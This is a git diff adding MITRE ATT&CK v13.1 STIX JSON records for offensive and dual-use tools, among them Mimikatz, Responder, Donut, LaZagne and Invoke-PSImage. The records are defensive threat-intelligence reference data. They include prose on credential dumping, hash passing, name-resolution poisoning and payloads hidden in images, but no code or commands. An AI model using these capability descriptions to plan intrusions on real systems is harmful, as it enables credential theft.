file mode 100644 index 0000000000000000000000000000000000000000..f7f65056337f3579fc69b74ae0ac52e6ce1e7031 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--999c4e6e-b8dc-4b4f-8d6e-1b829f29997e.json 
@@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--99f961b0-910b-4ec6-90d1-426ff318226d", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Office 365", + "Windows", + "Azure AD" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "MailSniper" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--999c4e6e-b8dc-4b4f-8d6e-1b829f29997e", + "type": "tool", + "created": "2019-10-05T02:34:01.189Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0413", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0413" + }, + { + "source_name": "GitHub MailSniper", + "url": "https://github.com/dafthack/MailSniper", + "description": "Bullock, B., . (2018, November 20). MailSniper. Retrieved October 4, 2019." + } + ], + "modified": "2020-03-30T17:01:41.302Z", + "name": "MailSniper", + "description": "MailSniper is a penetration testing tool for searching through email in a Microsoft Exchange environment for specific terms (passwords, insider intel, network architecture information, etc.). It can be used by a non-administrative user to search their own email, or by an Exchange administrator to search the mailboxes of every user in a domain.(Citation: GitHub MailSniper)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--9a2640c2-9f43-46fe-b13f-bde881e55555.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--9a2640c2-9f43-46fe-b13f-bde881e55555.json new file mode 100644 index 0000000000000000000000000000000000000000..ad8feda05e5cf33ffeced2d9104e32b54d7d4665 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--9a2640c2-9f43-46fe-b13f-bde881e55555.json @@ -0,0 +1,40 @@ +{ + "type": "bundle", + "id": "bundle--54697275-6ca3-4e44-ab77-c037e843cd11", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--9a2640c2-9f43-46fe-b13f-bde881e55555", + "type": "tool", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0225", + "external_id": "S0225" + }, + { + "source_name": "sqlmap Introduction", + "description": "Damele, B., Stampar, M. (n.d.). sqlmap. Retrieved March 19, 2018.", + "url": "http://sqlmap.org/" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "name": "sqlmap", + "description": "[sqlmap](https://attack.mitre.org/software/S0225) is an open source penetration testing tool that can be used to automate the process of detecting and exploiting SQL injection flaws. (Citation: sqlmap Introduction)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--9de2308e-7bed-43a3-8e58-f194b3586700.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--9de2308e-7bed-43a3-8e58-f194b3586700.json new file mode 100644 index 0000000000000000000000000000000000000000..3c76d4082edc955108e9cc7b61df104de15281bd --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--9de2308e-7bed-43a3-8e58-f194b3586700.json 
@@ -0,0 +1,46 @@ +{ + "type": "bundle", + "id": "bundle--29a76097-d67c-4313-9700-a5fdd2945a0c", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "pwdump" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--9de2308e-7bed-43a3-8e58-f194b3586700", + "type": "tool", + "created": "2017-05-31T21:32:13.051Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0006", + "external_id": "S0006" + }, + { + "source_name": "Wikipedia pwdump", + "description": "Wikipedia. (2007, August 9). pwdump. Retrieved June 22, 2016.", + "url": "https://en.wikipedia.org/wiki/Pwdump" + } + ], + "modified": "2020-08-13T20:12:50.895Z", + "name": "pwdump", + "description": "[pwdump](https://attack.mitre.org/software/S0006) is a credential dumper. (Citation: Wikipedia pwdump)", + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--a1dd2dbd-1550-44bf-abcc-1a4c52e97719.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--a1dd2dbd-1550-44bf-abcc-1a4c52e97719.json new file mode 100644 index 0000000000000000000000000000000000000000..8235994d4edee72f89e485c0513749d9c16ce248 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--a1dd2dbd-1550-44bf-abcc-1a4c52e97719.json 
@@ -0,0 +1,45 @@ +{ + "type": "bundle", + "id": "bundle--a0fcfe02-d87a-4a18-8d9a-33c8db995e51", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-17T14:01:57.617Z", + "name": "Responder", + "description": "Responder is an open source tool used for LLMNR, NBT-NS and MDNS poisoning, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. (Citation: GitHub Responder)", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_aliases": [ + "Responder" + ], + "type": "tool", + "id": "tool--a1dd2dbd-1550-44bf-abcc-1a4c52e97719", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0174", + "external_id": "S0174" + }, + { + "source_name": "GitHub Responder", + "description": "Gaffie, L. (2016, August 25). Responder. Retrieved November 17, 2017.", + "url": "https://github.com/SpiderLabs/Responder" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--a52edc76-328d-4596-85e7-d56ef5a9eb69.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--a52edc76-328d-4596-85e7-d56ef5a9eb69.json new file mode 100644 index 0000000000000000000000000000000000000000..f73a72de140b36dc59973a91cf323449107402af --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--a52edc76-328d-4596-85e7-d56ef5a9eb69.json 
@@ -0,0 +1,40 @@ +{ + "type": "bundle", + "id": "bundle--c206c568-ba9f-4dab-8747-c45de19b6a30", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--a52edc76-328d-4596-85e7-d56ef5a9eb69", + "type": "tool", + "created": "2017-05-31T21:33:11.426Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0122", + "external_id": "S0122" + }, + { + "source_name": "Mandiant APT1", + "description": "Mandiant. (n.d.). APT1 Exposing One of China\u2019s Cyber Espionage Units. Retrieved July 18, 2016.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "name": "Pass-The-Hash Toolkit", + "description": "[Pass-The-Hash Toolkit](https://attack.mitre.org/software/S0122) is a toolkit that allows an adversary to \"pass\" a password hash (without knowing the original password) to log in to systems. (Citation: Mandiant APT1)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--a7b5df47-73bb-4d47-b701-869f185633a6.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--a7b5df47-73bb-4d47-b701-869f185633a6.json new file mode 100644 index 0000000000000000000000000000000000000000..90d5b3ce2c635a5d9de513af3c93383abff4a4db --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--a7b5df47-73bb-4d47-b701-869f185633a6.json 
@@ -0,0 +1,61 @@ +{ + "type": "bundle", + "id": "bundle--58936f97-12ab-4a24-a3e0-aaaa7766aa00", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_contributors": [ + "The Wover, @TheRealWover" + ], + "x_mitre_aliases": [ + "Donut" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "tool", + "id": "tool--a7b5df47-73bb-4d47-b701-869f185633a6", + "created": "2022-03-25T13:35:46.781Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "S0695", + "url": "https://attack.mitre.org/software/S0695" + }, + { + "source_name": "NCC Group WastedLocker June 2020", + "url": "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/", + "description": "Antenucci, S., Pantazopoulos, N., Sandee, M. (2020, June 23). WastedLocker: A New Ransomware Variant Developed By The Evil Corp Group. Retrieved September 14, 2021." + }, + { + "source_name": "Introducing Donut", + "url": "https://thewover.github.io/Introducing-Donut/", + "description": "The Wover. (2019, May 9). Donut - Injecting .NET Assemblies as Shellcode. Retrieved October 4, 2021." + }, + { + "source_name": "Donut Github", + "url": "https://github.com/TheWover/donut", + "description": "TheWover. (2019, May 9). donut. Retrieved March 25, 2022." 
+ } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Donut](https://attack.mitre.org/software/S0695) is an open source framework used to generate position-independent shellcode.(Citation: Donut Github)(Citation: Introducing Donut) [Donut](https://attack.mitre.org/software/S0695) generated code has been used by multiple threat actors to inject and load malicious payloads into memory.(Citation: NCC Group WastedLocker June 2020)", + "modified": "2022-04-18T15:31:34.662Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Donut", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--afc079f3-c0ea-4096-b75d-3f05338b7f60.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--afc079f3-c0ea-4096-b75d-3f05338b7f60.json new file mode 100644 index 0000000000000000000000000000000000000000..0fefb0e961d030def7dec071b3a3c327e84f02fb --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--afc079f3-c0ea-4096-b75d-3f05338b7f60.json 
@@ -0,0 +1,56 @@ +{ + "type": "bundle", + "id": "bundle--cfe12df3-c332-4b3f-aa2b-b52772191c1c", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-07T13:04:10.731Z", + "name": "Mimikatz", + "description": "[Mimikatz](https://attack.mitre.org/software/S0002) is a credential dumper capable of obtaining plaintext Windows account logins and passwords, along with many other features that make it useful for testing the security of networks. (Citation: Deply Mimikatz) (Citation: Adsecurity Mimikatz Guide)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.7", + "x_mitre_contributors": [ + "Vincent Le Toux" + ], + "x_mitre_aliases": [ + "Mimikatz" + ], + "type": "tool", + "id": "tool--afc079f3-c0ea-4096-b75d-3f05338b7f60", + "created": "2017-05-31T21:32:11.544Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0002", + "external_id": "S0002" + }, + { + "source_name": "Deply Mimikatz", + "description": "Deply, B. (n.d.). Mimikatz. Retrieved September 29, 2015.", + "url": "https://github.com/gentilkiwi/mimikatz" + }, + { + "source_name": "Adsecurity Mimikatz Guide", + "description": "Metcalf, S. (2015, November 13). Unofficial Guide to Mimikatz & Command Reference. Retrieved December 23, 2015.", + "url": "https://adsecurity.org/?page_id=1821" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--b07c2c47-fefb-4d7c-a69e-6a3296171f54.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--b07c2c47-fefb-4d7c-a69e-6a3296171f54.json new file mode 100644 index 0000000000000000000000000000000000000000..a2ebe970e068b23e6e4473f4a71eb65ff5e7780e --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--b07c2c47-fefb-4d7c-a69e-6a3296171f54.json @@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--ab38de8d-f0e9-43d3-891d-246a9b7a3f45", + "spec_version": "2.0", + "objects": [ + { + "modified": "2022-09-22T20:55:32.937Z", + "name": "gsecdump", + "description": "[gsecdump](https://attack.mitre.org/software/S0008) is a publicly-available credential dumper used to obtain password hashes and LSA secrets from Windows operating systems. (Citation: TrueSec Gsecdump)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.2", + "x_mitre_aliases": [ + "gsecdump" + ], + "type": "tool", + "id": "tool--b07c2c47-fefb-4d7c-a69e-6a3296171f54", + "created": "2017-05-31T21:32:13.755Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0008", + "external_id": "S0008" + }, + { + "source_name": "TrueSec Gsecdump", + "description": "TrueSec. (n.d.). gsecdump v2.0b5. Retrieved September 29, 2015.", + "url": "https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "tool" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--b1595ddd-a783-482a-90e1-8afc8d48467e.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--b1595ddd-a783-482a-90e1-8afc8d48467e.json new file mode 100644 index 0000000000000000000000000000000000000000..295b4c1632240def7a3cdc8099a8bb29f7590d98 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--b1595ddd-a783-482a-90e1-8afc8d48467e.json 
@@ -0,0 +1,48 @@ +{ + "type": "bundle", + "id": "bundle--30abcd96-04d2-4133-afdc-8f1076df368b", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_aliases": [ + "IronNetInjector" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "tool", + "id": "tool--b1595ddd-a783-482a-90e1-8afc8d48467e", + "created": "2021-02-24T21:28:44.175Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "S0581", + "url": "https://attack.mitre.org/software/S0581" + }, + { + "source_name": "Unit 42 IronNetInjector February 2021 ", + "url": "https://unit42.paloaltonetworks.com/ironnetinjector/", + "description": "Reichel, D. (2021, February 19). IronNetInjector: Turla\u2019s New Malware Loading Tool. Retrieved February 24, 2021." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[IronNetInjector](https://attack.mitre.org/software/S0581) is a [Turla](https://attack.mitre.org/groups/G0010) toolchain that utilizes scripts from the open-source IronPython implementation of Python with a .NET injector to drop one or more payloads including [ComRAT](https://attack.mitre.org/software/S0126).(Citation: Unit 42 IronNetInjector February 2021 )", + "modified": "2022-05-20T17:02:59.587Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "IronNetInjector", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--b35068ec-107a-4266-bda8-eb7036267aea.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--b35068ec-107a-4266-bda8-eb7036267aea.json new file mode 100644 index 0000000000000000000000000000000000000000..0bedf3f22c336e0114073950fe500ca35236d060 
--- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--b35068ec-107a-4266-bda8-eb7036267aea.json @@ -0,0 +1,40 @@ +{ + "type": "bundle", + "id": "bundle--e1e81b54-5218-4499-9cc3-9e997d717d48", + "spec_version": "2.0", + "objects": [ + { + "labels": [ + "tool" + ], + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--b35068ec-107a-4266-bda8-eb7036267aea", + "type": "tool", + "created": "2017-05-31T21:33:03.773Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0102", + "external_id": "S0102" + }, + { + "source_name": "TechNet Nbtstat", + "description": "Microsoft. (n.d.). Nbtstat. Retrieved April 17, 2016.", + "url": "https://technet.microsoft.com/en-us/library/cc940106.aspx" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "name": "nbtstat", + "description": "[nbtstat](https://attack.mitre.org/software/S0102) is a utility used to troubleshoot NetBIOS name resolution. (Citation: TechNet Nbtstat)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--b52d6583-14a2-4ddc-8527-87fd2142558f.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--b52d6583-14a2-4ddc-8527-87fd2142558f.json new file mode 100644 index 0000000000000000000000000000000000000000..b6d6ea66134e19b66070816ed6674f991977c36f --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--b52d6583-14a2-4ddc-8527-87fd2142558f.json 
@@ -0,0 +1,45 @@
+{
+ "type": "bundle",
+ "id": "bundle--b9781d1d-e8ba-4f54-9c9e-51dd5f66b78b",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2022-10-18T22:02:48.228Z",
+ "name": "Invoke-PSImage",
+ "description": "[Invoke-PSImage](https://attack.mitre.org/software/S0231) takes a PowerShell script and embeds the bytes of the script into the pixels of a PNG image. It generates a one liner for executing either from a file of from the web. Example of usage is embedding the PowerShell code from the Invoke-Mimikatz module and embed it into an image file. By calling the image file from a macro for example, the macro will download the picture and execute the PowerShell code, which in this case will dump the passwords. (Citation: GitHub Invoke-PSImage)",
+ "x_mitre_deprecated": false,
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "x_mitre_version": "1.1",
+ "x_mitre_aliases": [
+ "Invoke-PSImage"
+ ],
+ "type": "tool",
+ "id": "tool--b52d6583-14a2-4ddc-8527-87fd2142558f",
+ "created": "2018-04-18T17:59:24.739Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0231",
+ "external_id": "S0231"
+ },
+ {
+ "source_name": "GitHub Invoke-PSImage",
+ "description": "Adams, B. (2017, December 17). Invoke-PSImage. Retrieved April 10, 2018.",
+ "url": "https://github.com/peewpw/Invoke-PSImage"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "labels": [
+ "tool"
+ ],
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--b63970b7-ddfb-4aee-97b1-80d335e033a8.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--b63970b7-ddfb-4aee-97b1-80d335e033a8.json
new file mode 100644
index 0000000000000000000000000000000000000000..aad8dbf077f474ccd673faa67e861f3b77fbe5ac
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--b63970b7-ddfb-4aee-97b1-80d335e033a8.json
@@ -0,0 +1,66 @@
+{
+ "type": "bundle",
+ "id": "bundle--aa82853c-1aff-4e12-a510-efc26bb052bf",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "labels": [
+ "tool"
+ ],
+ "x_mitre_platforms": [
+ "Windows",
+ "Linux",
+ "macOS"
+ ],
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "x_mitre_contributors": [
+ "Daniyal Naeem, BT Security"
+ ],
+ "x_mitre_aliases": [
+ "NBTscan"
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "id": "tool--b63970b7-ddfb-4aee-97b1-80d335e033a8",
+ "type": "tool",
+ "created": "2021-03-17T15:26:20.015Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "external_references": [
+ {
+ "external_id": "S0590",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0590"
+ },
+ {
+ "source_name": "Debian nbtscan Nov 2019",
+ "url": "https://manpages.debian.org/testing/nbtscan/nbtscan.1.en.html",
+ "description": "Bezroutchko, A. (2019, November 19). NBTscan man page. Retrieved March 17, 2021."
+ },
+ {
+ "source_name": "SecTools nbtscan June 2003",
+ "url": "https://sectools.org/tool/nbtscan/",
+ "description": "SecTools. (2003, June 11). NBTscan. Retrieved March 17, 2021."
+ },
+ {
+ "source_name": "Symantec Waterbug Jun 2019",
+ "url": "https://www.symantec.com/blogs/threat-intelligence/waterbug-espionage-governments",
+ "description": "Symantec DeepSight Adversary Intelligence Team. (2019, June 20). Waterbug: Espionage Group Rolls Out Brand-New Toolset in Attacks Against Governments. Retrieved July 8, 2019."
+ },
+ {
+ "source_name": "FireEye APT39 Jan 2019",
+ "url": "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html",
+ "description": "Hawley et al. (2019, January 29). APT39: An Iranian Cyber Espionage Group Focused on Personal Information. Retrieved February 19, 2019."
+ }
+ ],
+ "modified": "2021-04-24T20:45:08.323Z",
+ "name": "NBTscan",
+ "description": "[NBTscan](https://attack.mitre.org/software/S0590) is an open source tool that has been used by state groups to conduct internal reconnaissance within a compromised network.(Citation: Debian nbtscan Nov 2019)(Citation: SecTools nbtscan June 2003)(Citation: Symantec Waterbug Jun 2019)(Citation: FireEye APT39 Jan 2019)",
+ "x_mitre_version": "1.0",
+ "x_mitre_attack_spec_version": "2.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--b76b2d94-60e4-4107-a903-4a3a7622fb3b.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--b76b2d94-60e4-4107-a903-4a3a7622fb3b.json
new file mode 100644
index 0000000000000000000000000000000000000000..70b1e7ab812bfb588cd2b7ba3cf60d4dc27ab2e7
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--b76b2d94-60e4-4107-a903-4a3a7622fb3b.json
@@ -0,0 +1,54 @@
+{
+ "type": "bundle",
+ "id": "bundle--1282315f-c349-4313-9050-de4514292a99",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2023-03-02T20:48:02.590Z",
+ "name": "LaZagne",
+ "description": "[LaZagne](https://attack.mitre.org/software/S0349) is a post-exploitation, open-source tool used to recover stored passwords on a system. It has modules for Windows, Linux, and OSX, but is mainly focused on Windows systems. [LaZagne](https://attack.mitre.org/software/S0349) is publicly available on GitHub.(Citation: GitHub LaZagne Dec 2018)",
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ],
+ "x_mitre_deprecated": false,
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "x_mitre_version": "1.4",
+ "x_mitre_aliases": [
+ "LaZagne"
+ ],
+ "type": "tool",
+ "id": "tool--b76b2d94-60e4-4107-a903-4a3a7622fb3b",
+ "created": "2019-01-30T16:44:59.887Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0349",
+ "external_id": "S0349"
+ },
+ {
+ "source_name": "LaZagne",
+ "description": "(Citation: GitHub LaZange Dec 2018)"
+ },
+ {
+ "source_name": "GitHub LaZagne Dec 2018",
+ "description": "Zanni, A. (n.d.). The LaZagne Project !!!. Retrieved December 14, 2018.",
+ "url": "https://github.com/AlessandroZ/LaZagne"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "labels": [
+ "tool"
+ ],
+ "x_mitre_attack_spec_version": "3.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--b77b563c-34bb-4fb8-86a3-3694338f7b47.json b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--b77b563c-34bb-4fb8-86a3-3694338f7b47.json
new file mode 100644
index 0000000000000000000000000000000000000000..389193b1bc8a73fe863f5658888499a7f601f098
--- /dev/null
+++ b/cti-ATT-CK-v13.1/enterprise-attack/tool/tool--b77b563c-34bb-4fb8-86a3-3694338f7b47.json
@@ -0,0 +1,45 @@
+{
+ "type": "bundle",
+ "id": "bundle--89882108-8aa1-4720-a391-f66b7e90019b",
+ "spec_version": "2.0",
+ "objects": [
+ {
+ "modified": "2023-01-04T21:59:04.229Z",
+ "name": "Ping",
+ "description": "[Ping](https://attack.mitre.org/software/S0097) is an operating system utility commonly used to troubleshoot and verify network connections. (Citation: TechNet Ping)",
+ "x_mitre_deprecated": false,
+ "x_mitre_domains": [
+ "enterprise-attack"
+ ],
+ "x_mitre_version": "1.3",
+ "x_mitre_aliases": [
+ "Ping"
+ ],
+ "type": "tool",
+ "id": "tool--b77b563c-34bb-4fb8-86a3-3694338f7b47",
+ "created": "2017-05-31T21:33:01.483Z",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "revoked": false,
+ "external_references": [
+ {
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0097",
+ "external_id": "S0097"
+ },
+ {
+ "source_name": "TechNet Ping",
+ "description": "Microsoft. (n.d.). Ping. Retrieved April 8, 2016.",
+ "url": "https://technet.microsoft.com/en-us/library/bb490968.aspx"
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "labels": [
+ "tool"
+ ],
+ "x_mitre_attack_spec_version": "3.1.0",
+ "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5"
+ }
+ ]
+}
\ No newline at end of file
